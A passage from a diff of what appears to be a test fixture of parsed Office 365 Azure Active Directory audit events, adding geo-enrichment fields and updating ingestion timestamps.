APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -9214,6 +9790,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -9380,7 +9968,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125120100Z", + "ingested": "2021-12-14T14:48:43.176699293Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -9407,6 +9995,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -9573,7 +10173,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125127Z", + "ingested": "2021-12-14T14:48:43.176700143Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -9600,6 +10200,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -9769,7 +10381,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125133800Z", + "ingested": "2021-12-14T14:48:43.176700819Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlation
Id\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3393756Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118027\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"0031778a-80cf-49f8-aea2-f798c9bf1ec9\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 
5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -9796,6 +10408,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -9965,7 +10589,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125140500Z", + "ingested": "2021-12-14T14:48:43.176701519Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlation
